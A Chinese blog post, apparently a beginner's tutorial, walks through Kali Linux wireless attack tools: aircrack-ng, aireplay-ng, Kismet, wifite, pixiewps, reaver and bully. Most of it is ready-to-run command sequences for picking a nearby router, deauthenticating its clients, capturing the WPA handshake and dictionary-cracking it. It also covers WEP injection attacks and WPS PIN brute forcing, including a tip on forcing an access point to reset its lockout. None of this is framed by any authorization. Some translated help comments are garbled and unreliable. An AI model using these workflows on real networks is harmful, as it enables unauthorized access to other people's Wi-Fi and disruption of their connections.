kali linux 无线攻击工具(入门版-持续更新中)


    • 无线攻击篇
      • 蓝牙工具集合
      • 无线工具集合
        • iwconfig
          • 参数说明
        • Aircrack-ng
          • 参数说明
          • 使用说明
            • DEAUTHENTICATION攻击
          • 其他使用说明
            • -1 fakeauth count 伪装一个客户端和ap进行连接
            • -2 interactive 交互模式
            • -3 arp-request注入攻击模式
            • -4 chopchop攻击模式,用来获得一个包含密钥数据的xor文件
            • -5 fragment 碎片包攻击模式,用来获得PRGA(包含密钥的后缀为xor的文件)
        • Kismet
          • 参数说明
          • 使用说明
            • 1、初始化
            • 2、过程说明
            • 3、捕获的信息查阅
        • wifite
        • pixiewps
          • 参数说明
          • 简介
          • 使用说明
        • reaver
          • 参数说明
          • 使用说明
        • bully
          • 说明
          • 参数说明
          • 参数详细介绍
        • 原理分析
          • MAC地址绑定攻击
          • WEP密码破解原理
            • WEP共享密钥破解
            • ARP重放
          • WPA攻击
          • WPS攻击
          • 小实验


持续更新中~ 下次更新尽量一个月内吧,有些地方还是晦涩难懂。






iwconfig interface [选项]

Usage: iwconfig [interface]
	interface essid {NNN|any|on|off}
	interface mode {managed|ad-hoc|master|...}
	interface freq N.NNN[k|M|G]
	interface channel N
	interface bit {N[k|M|G]|auto|fixed}
	interface rate {N[k|M|G]|auto|fixed}
	interface enc {NNNN-NNNN|off}
	interface key {NNNN-NNNN|off}
	interface power {period N|timeout N|saving N|off}
	interface nickname NNN
	interface nwid {NN|on|off}
	interface ap {N|off|auto}
	interface txpower {NmW|NdBm|off|auto}
	interface sens N
	interface retry {limit N|lifetime N}
	interface rts {N|auto|fixed|off}
	interface frag {N|auto|fixed|off}
	interface modulation {11g|11a|CCK|OFDMg|...}
	interface commit 

    auto: 自动模式
    essid:设置ESSID  //设置ESSID(或网络名称——在某些产品中也可以称为域ID)。ESSID用于标识属于同一虚拟网络的单元。与定义单个单元的AP地址或NWID不同,ESSID定义了通过中继器或基础设施连接的一组单元,用户可以在这些单元中透明地漫游。对于某些卡片,您可以使用off或any(和on来重新启用它)禁用ESSID检查(ESSID混杂)。如果您的网络的ESSID是一个特殊的关键字(off、on或any),您应该使用——以转义它。
    nwid:设置网络ID  // 设置网络ID。由于所有相邻的无线网络共享相同的介质,该参数用于区分它们(创建逻辑并列网络)并识别属于同一单元的节点。此参数仅用于802.11之前的硬件,802.11协议使用此功能的ESSID和AP地址。对于某些卡,可以使用off(和on)禁用网络ID检查(NWID混杂)来重新启用它。
    freq: 设置无线网络通信频段/率
    chanel: 设置无线网络通信信道   
    sens: 设置无线网络设备的感知阀值 //适当设置这些阈值可以防止卡在接收微弱信号的同时浪费时间在背景噪声上。默认现在硬件感知都自动化了吧。
    mode: 设置无线网络设备的通信设备
    ap: 强迫无线网卡向给定地址的接入点注册 /使用off来重新启用自动模式,而不需要更改当前的访问点,或者您可以使用any或auto来强制卡与当前最佳的访问点重新关联。
    nick<名字>: 为网卡设定别名
    rate<速率>: 设定无线网卡的速率
    rts<阀值>: 在传输数据包之前增加一次握手,确信信道在正常的
    power: 无线网卡的发射功率设置


> Executing “aircrack-ng --help”

  Aircrack-ng 1.6  - (C) 2006-2020 Thomas d'Otreppe

  usage: aircrack-ng [options] 

  Common options:

      -a  : force attack mode (1/WEP, 2/WPA-PSK)           //强制攻击模式
      -e  : target selection: network identifier                        //目标选择:网络标识符
      -b  : target selection: access point's MAC                     //目标选择:通过接入点的MAC
      -p  : # of CPU to use  (default: all CPUs)                    //使用的CPU数量;默认全部
      -q         : enable quiet mode (no status output)                          //启用安静模式(无状态输出)
      -C   : merge the given APs to a virtual one                   //将给定的AP合并为虚拟AP
      -l   : write key to file. Overwrites file.                             //重写文件,将秘匙写入文件中

  Static WEP cracking options:                                                        //静态WEP破解选项:

      -c         : search alpha-numeric characters only
      -t         : search binary coded decimal chr only
      -h         : search the numeric key for Fritz!BOX
      -d   : use masking of the key (A1:XX:CF:YY)
      -m  : MAC address to filter usable packets
      -n  : WEP key length :  64/128/152/256/512
      -i  : WEP key index (1 to 4), default: any
      -f  : bruteforce fudge factor,  default: 2
      -k  : disable one attack method  (1 to 17)
      -x or -x0  : disable bruteforce for last keybytes
      -x1        : last keybyte bruteforcing  (default)
      -x2        : enable last  2 keybytes bruteforcing
      -X         : disable  bruteforce   multithreading
      -y         : experimental  single bruteforce mode
      -K         : use only old KoreK attacks (pre-PTW)
      -s         : show the key in ASCII while cracking
      -M    : specify maximum number of IVs to use
      -D         : WEP decloak, skips broken keystreams
      -P    : PTW debug:  1: disable Klein, 2: PTW
      -1         : run only 1 try to crack key with PTW
      -V         : run in visual inspection mode

  WEP and WPA-PSK cracking options:

      -w  : path to wordlist(s) filename(s)
      -N   : path to new session filename
      -R   : path to existing session filename

  WPA-PSK options:

      -E   : create EWSA Project file v3
      -I    : PMKID string (hashcat -m 16800)
      -j   : create Hashcat v3.6+ file (HCCAPX)
      -J   : create Hashcat file (HCCAP)
      -S         : WPA cracking speed test
      -Z    : WPA cracking speed test length of
      -r     : path to airolib-ng database
                   (Cannot be used with -w)

  SIMD selection:

      --simd-list       : Show a list of the available
                          SIMD architectures, for this
aireplay-ng -0 0 -a kifi -c  


设置网卡为监听模式:airmon-ng start wlan0
扫描附近的WIFI:airodump-ng wlan0mon
选定一个路由器,并监听其流量:airodump-ng -w tplink -c 11 --bssid {MAC1} wlan0mon
选定连接的一个客户端,进行攻击:aireplay-ng -0 50 -a {MAC1} -c {MAC2} wlan0mon
对抓取到的cap包进行暴力破解:aircrack-ng -w password.txt -b {MAC1} tplink-01.cap

  1. 查看无线网卡名字:iwconfig 或者 ifconfig -a 都可以

  2. 开启网卡监听模式:airmon-ng start wlan0 。
    网卡开启了监听模式之后网卡的名字就变为 wlan0mon 了,以后的所有命令中的网卡名都是叫 wlan0mon

  3. 扫描附近的WIFI:airodump-ng wlan0mon

BSSID :AP端的MAC地址,如果在Client Section中BSSID显示为“not associated”意味着客户端没有和AP连接上
PWR :信号的水平强度,越大越好
Beacons :AP发出的通告编号,每个接入点(AP)在最低速率(1M)时差不多每秒发送10个左右的beacon,所以他们能够在很远的地方被发现
#Data: 对应路由器在线吞吐量,数字越大,数据上传量越大(数据越大表示在正常情况下使用的人越多,选择此目标成功率大些
CH :信号道(对应路由器的所在频道 / 渠道)
MB :连接速度 / AP支持的最大速率,如果:
ENC :使用的加密算法体系
CIPHER :检测到的加密算法
AUTH :使用的认证协议
ESSID :对应的路由器名称(越往上信号越好)
Lost :在过去10s丢失的数据分组
Probes :被客户端查探的ESSID,如果客户端正在试图连接一个AP但是没有连接上,那么就显示在这里。
RXQ :接受质量,用于衡量所有帧和管理所有帧
  1. 选定一个准备破解的WIFI

  2. 监听该路由器的流量:
    airodump-ng -w tplink -c 11 --bssid BC:46:99:3D:66:D6 wlan0mon # -w 参数指定生成的文件名 -c 指定信道 --bssid指定路由器的MAC地址

  3. 重新打开一个命令行窗口,开始攻击!之前的窗口继续保留,用于观察是否抓包成功
    aireplay-ng -0 50 -a BC:46:99:3D:66:D6 -c A0:AF:BD:D8:E6:31 wlan0mon # 50是发包的数量 -a指定路由器的MAC地址 -c指定连接的客户端的MAC地址

  4. 如果看到[ WPA handshake: MAC],就说明握手包抓取成功了

    我们可以在命令行运行的所在目录下,看到会生成四个文件,其中我们有用的文件是以 cap 后缀结尾的文件

  5. 对抓取到的cap包进行破解,这需要我们准备好破解的密码字典。所以,无论是任何破解,都需要一个强大的密码字典!

    kali下自带有一份无线密码字典——> /usr/share/wordlists/rockyou.txt.gz ,我们将其解压

    aircrack-ng -w /usr/share/wordlists/rockyou.txt -b BC:46:99:3D:66:D6 tplink-01.cap #-w指定 密码字典 -b指定路由器的MAC地址



aireplay-ng -0 10 -a ap_mac -c 合法客户端mac wifi0


-1 fakeauth count 伪装一个客户端和ap进行连接


aireplay-ng -1 0 -e ap_essid -a ap_mac -h my_mac wifi0
aireplay-ng -1 0 -e kifi -a  -h  
aireplay-ng -1 60 -o 1 -q 10 -e  -a  -h  

-o 1 每次身份认证只发一组认证数据包
-q 10 每10秒发keep-live帧

Denied(Code 1)is WPA in use
WPA/WPA2不支持Fake authentication

-2 interactive 交互模式


ireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b ap_mac -h my_mac wifi0


aireplay-ng -2 -r myarp -x 1024 wifi0


-3 arp-request注入攻击模式

aireplay-ng -3 -b ap_mac -h 合法客户端mac -x 512 wifi0

-4 chopchop攻击模式,用来获得一个包含密钥数据的xor文件
aireplay-ng -3 -b  -h  
aireplay-ng -4 -b ap-mac -h my_mac wifi0

-h 合法客户端/ 攻击者MAC
aireplay-ng data 字段

-5 fragment 碎片包攻击模式,用来获得PRGA(包含密钥的后缀为xor的文件)

aireplay-ng -5 -b ap_mac -h my_mac wifi0
packetforge-ng 数据包制造程序

packetforge-ng -0 -a ap_mac -h my_mac wifi0 -k -l255.255.255.255 -y niam_xor -w mrarp

aircrack-ng -n 64 -b ap_mac name-01.ivs


> Executing “kismet -h”
usage: kismet [OPTION]
Nearly all of these options are run-time overrides for values in the kismet.conf configuration file.  //几乎所有这些选项都是kismet.conf配置文件中值的运行时替代。
Permanent changes should be made to.the configuration file. //应该对配置文件进行永久更改
 *** Generic Options ***
 -v, --version                Show version
     --no-console-wrapper     Disable server console wrapper //禁用服务器控制台包装器
     --no-ncurses-wrapper     Disable server console wrapper//禁用服务器控制台包装器
     --debug                  Disable the console wrapper and the crash//禁用控制台包装和崩溃
                              handling functions, for debugging//处理函数,用于调试
 -f, --config-file      Use alternate configuration file//使用备用配置文件
     --no-line-wrap           Turn of linewrapping of output//使用备用配置文件
                              (for grep, speed, etc)
 -s, --silent                 Turn off stdout output after setup phase//使用备用配置文件
     --daemonize              Spawn detached in the background//后面的卒子脱离了
     --no-plugins             Do not load plugins//不要加载插件
     --homedir          Use an alternate path as the home //使用替代路径作为主路径
                               directory instead of the user entry//目录而不是用户条目
     --confdir          Use an alternate path as the base //使用替代路径作为基准
                               config directory instead of the default //目录而不是默认目录
                               set at compile time//在编译时设置
     --datadir          Use an alternate path as the data//使用替代路径作为数据
                               directory instead of the default set at //目录而不是默认设置为
                               compile time.//编译时间。
 *** Logging Options ***
 -T, --log-types       Override activated log types//重写激活的日志类型
 -t, --log-title       Override default log title//重写默认日志标题
 -p, --log-prefix <prefix>    Directory to store log files//存储日志文件的目录
 -n, --no-logging             Disable logging entirely//完全禁用日志记录

 *** Device Tracking Options ***
     --device-timeout=n       Expire devices after N seconds //N 秒后终止设备
  <p><a href="http://img.e-com-net.com/image/info8/1ea2166e52b84375934e3abfa4a7c339.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/1ea2166e52b84375934e3abfa4a7c339.jpg" alt="kali linux 无线攻击工具(入门版-持续更新中)_第1张图片" width="650" height="372" style="border:1px solid black;"></a><br> <a href="http://img.e-com-net.com/image/info8/70c1fb23839d49e1a64d495fb312def3.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/70c1fb23839d49e1a64d495fb312def3.jpg" alt="kali linux 无线攻击工具(入门版-持续更新中)_第2张图片" width="650" height="341" style="border:1px solid black;"></a><br> <a href="http://img.e-com-net.com/image/info8/489b3b72c9374c7b9b530f88de5ce4a7.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/489b3b72c9374c7b9b530f88de5ce4a7.jpg" alt="kali linux 无线攻击工具(入门版-持续更新中)_第3张图片" width="650" height="346" style="border:1px solid black;"></a><br> <a href="http://img.e-com-net.com/image/info8/c09e7546ff4940f9bc32020a17c533a4.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/c09e7546ff4940f9bc32020a17c533a4.jpg" alt="kali linux 无线攻击工具(入门版-持续更新中)_第4张图片" width="650" height="344" style="border:1px solid black;"></a><br> <a href="http://img.e-com-net.com/image/info8/38814cb1fe5c457f872e638f7ea7ec96.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/38814cb1fe5c457f872e638f7ea7ec96.jpg" alt="kali linux 无线攻击工具(入门版-持续更新中)_第5张图片" width="650" height="345" style="border:1px solid black;"></a><br> <a href="http://img.e-com-net.com/image/info8/d0e3a92638644a44a2159651b6426873.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/d0e3a92638644a44a2159651b6426873.jpg" alt="kali linux 无线攻击工具(入门版-持续更新中)_第6张图片" width="650" height="343" style="border:1px solid black;"></a><br> <a href="http://img.e-com-net.com/image/info8/f3574b5f636e4237bb9cea234f2d0f2b.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/f3574b5f636e4237bb9cea234f2d0f2b.jpg" alt="kali linux 无线攻击工具(入门版-持续更新中)_第7张图片" width="650" height="180" style="border:1px solid black;"></a></p> 
  <p><a href="http://img.e-com-net.com/image/info8/57ca24d0e5614d2ba8e15e3c940c74a6.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/57ca24d0e5614d2ba8e15e3c940c74a6.jpg" alt="kali linux 无线攻击工具(入门版-持续更新中)_第8张图片" width="201" height="234" style="border:1px solid black;"></a></p> 
   <li> <p>无线网卡开启监听模式<br> <code>airmon-ng start wlan0</code> 网卡改变为监听状态,改名未wlan0mon<br> ps: wlan0 是我的笔记本无线网卡<br> 查看自己的笔记本无线网卡是哪个的方法:<br> iwconfig:查看当前未监听状态以及监听状态的网卡名称。</p> </li> 
   <li> <p>修改默认配置文件(/etc/kismet/kismet.conf)</p> </li> 
  <pre><code># See the README for more information how to define sources; sources take the
# form of:
# source=interface:options
# For example to capture from a Wi-Fi interface in Linux you could specify:
# or to specify a custom name,
# source=ath9k
# Sources may be defined in the config file or on the command line via the 
# '-c' option.  Sources may also be defined live via the WebUI.
# Kismet does not pre-define any sources, permanent sources can be added here
# or in kismet_site.conf
  <ol start="3"> 
   <li>启动<br> sudo kismet<br> 浏览器访问<br> 然后就能看到嗅探到的信息了。</li> 
  <p>通过 Kismet -s,不在输出终端下输出相关嗅探的ap信息。<br> 默认嗅探到的信息都保存在当前执行命令的环境下目录下,后缀为kismet。</p> 
   <li>当Kismet开始运行时,它将会显示这个区域内它找到的所有的无线局域网,“Name”那一列中所显示出来的内容就是AP的SSID,CH列显示频道,点击任意SSID可以看到BSSID(AP 的MAC地址),加密类型(无),设备厂家(cisco)信息。最下方是接入该AP的终端MAC,类型,使用频率(2.467GHz),网卡型号等信息。甚至当目标计算机已关闭时,Kismet也正可从我们的目标AP中检测到数据包,这是因为目标AP在不停地发出“beacons”。</li> 
  <p>相对于 Aircrack-ng 的使用更加容易,相当于吧 Aircrack-ng 的操作过程集成在一步完成。</p> 
   <li>启动wifite。<br> 直接输入 wifite<br> 启动即扫描</li> 
   <li>等待扫描出你需要破解的wifi<br> <a href="http://img.e-com-net.com/image/info8/ce6279b9d980468cb2fda318f6fccfc3.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/ce6279b9d980468cb2fda318f6fccfc3.jpg" alt="kali linux 无线攻击工具(入门版-持续更新中)_第9张图片" width="567" height="120" style="border:1px solid black;"></a><br> CH:是指wifi的信道,这个请自行百度,新一代路由器都会自动分配最佳信道。<br> ENCR:是路由器的加密方式,有一种是WEP加密方式很好破解;<br> POWER:是无线信号强度;<br> WPS:是路由上的WPS开关是否开启,通常是纯数字,也开启的也很好破解;<br> CLIENT:是指监听到有多少客户端连接到路由,仅供参考。<br> BSSID代表路由器的 MAC 地址<br> AUTH 代表认证的方式<br> ESSID是WIFI的名字</li> 
   <li>ctrl+c 停止扫描<br> 按照提示输入你的目标 wifi num数<br> <a href="http://img.e-com-net.com/image/info8/1df1f8cfe5bb47c4ac07848636c4003c.jpg" target="_blank"><img src="http://img.e-com-net.com/image/info8/1df1f8cfe5bb47c4ac07848636c4003c.jpg" alt="kali linux 无线攻击工具(入门版-持续更新中)_第10张图片" width="650" height="210" style="border:1px solid black;"></a></li> 
   <li>暴力破解前自行决定是否更换密码字典。<br> wifite 的默认密码字典是 /usr/share/dict/wordlist-probable.txt<br> 字典内容格式是一行一个密码<br> 你可以选择网络搜集别人分享的密码字典,或者根据社会工程学利用crunch来生成对应的密码字典。</li> 
   <li>破解时间比较长,我用老电脑跑8位全数字密码字典大概5个多小时。后面研究下用GPU跑字典,时间 是不是短点。</li> 
  <pre><code> [+] 1 attack completed:
 [+] 1/1 WEP attacks succeeded
        cracked Test (14:E6:E4:AC:FB:20), key: "6162636465"
 [+] disabling monitor mode on mon0… done
 [+] quitting
  <pre><code>> Executing “pixiewps -h”
 Pixiewps 1.4 WPS pixie-dust attack tool
 Copyright (c) 2015-2017, wiire <wi7ire@gmail.com>
 Usage: pixiewps <arguments>
 Required arguments: //必要参数
   -e, --pke         : Enrollee public key  //注册会员公开密码匙
   -r, --pkr         : Registrar public key //注册主任公开密码匙
   -s, --e-hash1     : Enrollee hash-1 // 加入者hash值
   -z, --e-hash2     : Enrollee hash-2
   -a, --authkey     : Authentication session key //认证会话密钥
   -n, --e-nonce     : Enrollee nonce //新登记
 Optional arguments://可选参数:
   -m, --r-nonce     : Registrar nonce//注册主任
   -b, --e-bssid     : Enrollee BSSID
   -v, --verbosity   : Verbosity level 1-3, 1 is quietest           [3] //详细程度1-3级,1级最安静
   -o, --output      : Write output to file //将输出写入文件
   -j, --jobs        : Number of parallel threads to use         [Auto] //使用的线程数

   -h                : Display this usage screen //显示此用法帮助界面
   --help            : Verbose help and more usage examples//详细帮助和更多的使用示例
   -V, --version     : Display version//显示版本

   --mode N[,... N]  : Mode selection, comma separated           [Auto] //模式选择,逗号分隔
   --start [mm/]yyyy : Starting date             (only mode 3) [+1 day] //开始日期
   --end   [mm/]yyyy : Ending date               (only mode 3) [-1 day] //结束日期
   -f, --force       : Bruteforce full range     (only mode 3) //野兽力全射程
 Miscellaneous arguments:  //其他参数:
   -7, --m7-enc      : Recover encrypted settings from M7 (only mode 3)  //从 M7恢复加密设置
   -5, --m5-enc      : Recover secret nonce from M5       (only mode 3)  //从 M5中恢复秘密

 Example (use --help for more):
 pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
  <pre><code>--help example
 Pixiewps 1.4 WPS pixie-dust attack tool
 Copyright (c) 2015-2017, wiire <wi7ire@gmail.com>

 Description of arguments:

 -e, --pke

     Enrollee's DH public key, found in M1.

 -r, --pkr

     Registrar's DH public key, found in M2.

 -s, --e-hash1

     Enrollee hash-1, found in M3. It's the hash of the first half of the PIN.

 -z, --e-hash2

     Enrollee hash-2, found in M3. It's the hash of the second half of the PIN.

 -a, --authkey

     Authentication session key. Although for this parameter a modified version of Reaver or Bully is needed, it can be avoided by specifying small Diffie-Hellman keys in both Reaver and Pixiewps and supplying --e-nonce, --r-nonce and --e-bssid.

 [?] pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -S -n <e-nonce> -m <r-nonce> -b <e-bssid>

 -n, --e-nonce

     Enrollee's nonce, found in M1.

 -m, --r-nonce

     Registrar's nonce, found in M2. Used with other parameters to compute the session keys.

 -b, --e-bssid

     Enrollee's BSSID. Used with other parameters to compute the session keys.

 -S, --dh-small (deprecated)

     Small Diffie-Hellman keys. The same option must be specified in Reaver too. Some Access Points seem to be buggy and don't behave correctly with this option. Avoid using it with Reaver when possible

 --mode N[,... N]

     Select modes, comma separated (experimental modes are not used unless specified):

         1 (RT/MT/CL)
         2 (eCos simple)
         3 (RTL819x)
         4 (eCos simplest) [Experimental]
         5 (eCos Knuth)    [Experimental]

 --start [mm/]yyyy
 --end   [mm/]yyyy

     Starting and ending dates for mode 3. They are interchangeable. If only one is specified, the current time will be used for the other. The earliest possible date is 01/1970, corresponding to 0 (Unix epoch time), the latest is 02/2038, corresponding to 0x7FFFFFFF. If --force is used then pixiewps will start from the current time and go back all the way to 0.

 -7, --m7-enc

     Encrypted settings, found in M7. Recover Enrollee's WPA-PSK and secret nonce 2. This feature only works on some Access Points vulnerable to mode 3.

 [?] pixiewps -e <pke> -r <pkr> -n <e-nonce> -m <r-nonce> -b <e-bssid> -7 <enc7> --mode 3

 -5, --m5-enc

     Encrypted settings, found in M5. Recover Enrollee's secret nonce 1. This option must be used in conjunction with --m7-enc. If --e-hash1 and --e-hash2 are also specified, pixiewps will also recover the WPS PIN.

 [?] pixiewps -e <pke> -r <pkr> -n <e-nonce> -m <r-nonce> -b <e-bssid> -7 <enc7> -5 <enc5> --mode 3
 [?] pixiewps -e <pke> -r <pkr> -n <e-nonce> -m <r-nonce> -b <e-bssid> -7 <enc7> -5 <enc5> -s <e-hash1> -z <e-hash2> --mode 3

  <p>只适用于固定厂商的芯片,成功率很低<br> 很多厂家实现了锁定机制,所以爆破时应注意限速<br> 一旦触发锁定,可尝试耗尽AP连接数,令其重启并解除WPS锁定</p> 
  <p>开源地址:https://github.com/wiire-a/pixiewps<br> 国内镜像:https://gitee.com/lhc0101/pixiewps</p> 
  <p>首先确保你的无线网卡能工作,进入monitor模式<br> <code>airmon-ng start wlan0</code></p> 
  <pre><code>	wash -C -i wlan0mon 
	airodump-ng wlan0mon --wps  
  <p>来扫描开WPS的AP ctrl+c停止</p> 
  <pre><code>	 reaver -i wlan0mon -b <AP mac> -vv 
	 reaver -i wlan0mon -b <AP mac> -vv -K 1 
  <p>想要攻击的AP’MAC地址 -v -K 1<br> 如果存在该漏洞的话,很快就能出pin和密码了</p> 
  <pre><code>	reaver -i wlan0mon -b <AP mac> -vv -p 88888888
  <pre><code>-i  无线网卡名称
-b  目标AP的mac地址
-a  自动检测目标AP最佳配置
-S  使用最小的DH key,可以提高破解速度
-vv  显示更多的非严重警告(注意这是 2 个小写字母 v)
-d  即delay每穷举一次的闲置时间 预设为1秒
-c  信道编号
-p  PIN码四位或八位  //可以用8位直接找到密码。
   <li>同上先开启无线网卡监听<br> <code>airmon-ng start wlan0</code></li> 
   <li>然后附近 WLAN 网络<br> <code>airodump-ng wlan0mon</code></li> 
   <li>找出开启了 WPS 功能、可以使用 PIN码 登录的路由器,并另外记录下该 AP 的 BSSID(约等于该 AP 的 MAC 地址):<br> <code>wash -i wlan0mon</code></li> 
   <li>开始进行 PIN码 穷举破解(注意末尾的参数是 2 个小写字母 v):<br> <code>reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -vv</code><br> <code>reaver -i wlan0mon -b D8:15:0D:D6:13:92 -a -S -d9 -t9 -vv</code> -d9 -t9时间间隔,防止挂掉</li> 
   <li>破解完成后,查看并记录下 PIN码 和 密码,获取到 PIN码 后,以后即便路由器更换了密码,也可以很迅速地通过 PIN码 重新获得新密码。举例:<br> <code>reaver -i wlan0mon -b xx:xx:xx:xx:xx:xx -p 12316977</code></li> 
  <p>是 WPS 穷举法的一个新实现,用 c 语言编写。 它在概念上与其他程序相同,因为它利用了 WPS 规范中的(现在众所周知的)设计缺陷。 与原始的 reaver 代码相比,它有几个优点。 其中包括减少依赖项、改进内存和 cpu 性能、正确处理 endianness 以及更健壮的选项集。 它运行在 Linux 上,并且是专门为在嵌入式 Linux 系统(OpenWrt 等)上运行而开发的,无论其体系结构如何。</p> 
  <pre><code>usage: bully \ interface
Required arguments:
  interface      : Wireless interface in monitor mode (root required)
  -b, --bssid macaddr    : MAC address of the target access point
  -e, --essid string     : Extended SSID for the access point
Optional arguments:
  -c, --channel N[,N...] : Channel number of AP, or list to hop [b/g]
  -i, --index N          : Starting pin index (7 or 8 digits)  [Auto]
  -l, --lockwait N       : Seconds to wait if the AP locks WPS   [43]
  -o, --outfile file     : Output file for messages          [stdout]
  -p, --pin N            : Starting pin number (7 or 8 digits) [Auto]
  -s, --source macaddr   : Source (hardware) MAC address      [Probe]
  -u, --lua              : Lua script file
  -v, --verbosity N      : Verbosity level 1-3, 1 is quietest     [3]
  -w, --workdir path     : Location of pin/session files  [~/.bully/]
  -5, --5ghz             : Hop on 5GHz a/n default channel list  [No]
  -B, --bruteforce       : Bruteforce the WPS pin checksum digit [No]
  -F, --force            : Force continue in spite of warnings   [No]
  -S, --sequential       : Sequential pins (do not randomize)    [No]
  -T, --test             : Test mode (do not inject any packets) [No]
Advanced arguments:
  -d, --pixiewps         : Attempt to use pixiewps               [No]
  -g, --genpin N         : Pin Generator [1] D-Link [2] Belkin    [0]
  -a, --acktime N        : Deprecated/ignored                  [Auto]
  -r, --retries N        : Resend packets N times when not acked  [2]
  -m, --m13time N        : Deprecated/ignored                  [Auto]
  -t, --timeout N        : Deprecated/ignored                  [Auto]
  -1, --pin1delay M[,N]  : Delay M seconds every Nth nack at M5 [0,1]
  -2, --pin2delay M[,N]  : Delay M seconds every Nth nack at M7 [5,1]
  -A, --noacks           : Disable ACK check for sent packets    [No]
  -C, --nocheck          : Skip CRC/FCS validation (performance) [No]
  -D, --detectlock       : Detect WPS lockouts unreported by AP  [No]
  -E, --eapfail          : EAP Failure terminate every exchange  [No]
  -L, --lockignore       : Ignore WPS locks reported by the AP   [No]
  -M, --m57nack          : M5/M7 timeouts treated as WSC_NACK's  [No]
  -N, --nofcs            : Packets don't contain the FCS field [Auto]
  -P, --probe            : Use probe request for nonbeaconing AP [No]
  -Q, --wpsinfo          : Use probe request to gather WPS info  [No]
  -R, --radiotap         : Assume radiotap headers are present [Auto]
  -W, --windows7         : Masquerade as a Windows 7 registrar   [No]
  -Z, --suppress         : Suppress packet throttling algorithm  [No]
  -V, --version          : Print version info and exit
  -h, --help             : Display this help information
  <pre><code>  -c, --channel N[,N...]

	Channel number, or comma separated list of channels to hop on. Some AP's will switch
	channels periodically. This option allows bully to reacquire an AP and continue an attack
	without intervention. Note that using channel hopping will typically slow an attack,
	especially when the AP's signal is weak, because time is spent scanning channels instead
	of testing pins. If no channel is provided, bully will hop on all channels.

  -i, --index N

	This is the index of the starting pin number in the randomized pin file. This option is
	not valid when running bully in sequential pin search mode.  This is typically handled
	for you automatically, i.e. an interrupted session will resume after the last pin that
	was successfully tested. Note that when less than 7 digits (8 digits if -B is active) are
	given, zeroes are padded on the left.

  -l, --lockwait N

	Number of seconds to wait when an AP locks WPS. Most AP's will lock out for 5 minutes, so
	the default value is 43 seconds. This will cause bully to sleep 7 times during a lockout
	period for a total of 301 seconds.

  -o, --output file

	By default, messages are printed to the standard output. Use this option to send output 
	to the specified file instead.

  -p, --pin N

	This is the starting pin number. Use of this option results in a sequential pin search
	starting at the given pin. This is typically handled for you automatically, i.e. an
	interrupted session will resume after the last pin that was successfully tested. Note
	that when less than 7 digits (8 digits if -B is active) are given, zeroes are padded on
	the left.

  -s, --source macaddr

	The source MAC address to embed in packets sent to the AP. Not all wireless cards can be
	used to spoof the source MAC address like this, but the option is provided for chipsets
	that allow it. When not provided, the wireless interface is probed to retrieve the MAC.

  -v, --verbosity N

	Verbosity level. 1 is the quietest, displaying only unrecoverable error information. Level
	3 displays the most information, and is best used to determine exactly what is happening
	during a session.

  -w, --workdir path

	Working directory, where randomized pins and session files are stored. Session files are
	created in this directory based on the BSSID of the access point. Only one set of randomized
	pins is created, and is used for all sessions. If you want to regenerate the pin file, simply
	delete it from this directory; however incomplete runs that used the deleted file will not
	be restartable. The default directory is ~/.bully/

  -5, --5ghz

	Use 5 GHz (a/n) channels instead of 2.54 GHz (b/g) channels. Untested.

  -B, --bruteforce

	Bruteforce the WPS pin checksum digit rather than calculating it according to the WPS
	specification. Some AP's use a non-compliant checksum in an attempt to evade attacks from
	compliant software. Use of this option can result in a ten-fold increase in the time it
	takes to discover the second portion of the pin, and should only be used when necessary.

  -F, --force

	In certain scenarios bully will print a warning message and exit. This typically indicates that
	it is being used in a manner that is questionable for most users. Advanced users and developers
	can force continuance with this option.

  -S, --sequential

	By default, pins are randomized. This options allows pins to be tested sequentially.

  -T, --test

	Test mode. No packets are injected. Can be used to validate arguments, determine if an
	access point is visible and has WPS enabled, generate a randomized pin file, or create a
	session file for the access point.

  -d, --pixiewps
            The -d option performs an offline attack, Pixie Dust (pixiewps),
	by automatically passing the PKE, PKR, E-Hash1, E-Hash2, E-Nonce and Authkey.
	pixiewps will then try to attack Ralink, Broadcom and Realtek chipsets.

  -g, --genpin N
            This is a pin generator for either [1] D-Link or [2] Belkin
	routers which uses a known vulnerability names "pingen attack".

  -a, --acktime N

	Deprecated. Packet timings are throttled automatically. Will be removed in future revision.

  -r, --retries N

	How many times do we resend packets when they aren't acknowledged? Default is 3. The idea is to
	make a best effort to ensure the AP receives every packet we send, rather than have transactions
	fail and restart due to a missed packet.

  -m, --m13time N

	Deprecated. Packet timings are throttled automatically. Will be removed in future revision.

  -t, --timeout N

	Deprecated. Packet timings are throttled automatically. Will be removed in future revision.

  -1, --pin1delay M[,N]

	Delay M seconds for every Nth NACK at M5. The default is 0,1 (no delay). Some access points
	get overwhelmed by too many successive WPS transactions, and can even crash if we don't dial
	things back a bit. This is the delay period to use during the first half of the pin.

  -2, --pin2delay M[,N]

	Delay M seconds for every Nth NACK at M7. The default is 0,1 (no delay). Some access points
	handle transactions through M4 easily, only to fall down on too many successive M6 messages.
	This is the delay period to use during the second half of the pin.
  -A, --noacks

	Turn off acknowledgement processing for all sent packets. Useful if you are sure the AP is
	receiving packets even though bully can't see acknowledgements. You might need this for a USB
	wifi adapter that processes acknowledgements and drops them before libpcap ever sees them.

  -C, --nocheck

	Turn off frame check sequence processing. We can improve performance somewhat by making the
	dubious assumption that all packets we receive are valid. See also --nofcs below.

  -D, --detectlock

	Certain access points do not indicate that they have locked WPS in their beacon IE tags, but
	summarily ignore all WPS transactions for a period of time. With this option, we can detect the
	condition and sleep for --lockdelay seconds before resuming. In the interests of remaining
	undetected, there is no point in broadcasting 5 minutes worth of unanswered EAP START messages.

  -E, --eapfail

	Send EAP FAIL messages after each transaction. Some AP's get confused when they don't see this.

  -L, --lockignore

	Ignore WPS lock conditions reported in beacon information elements (don't sleep).

  -M, --m57nack

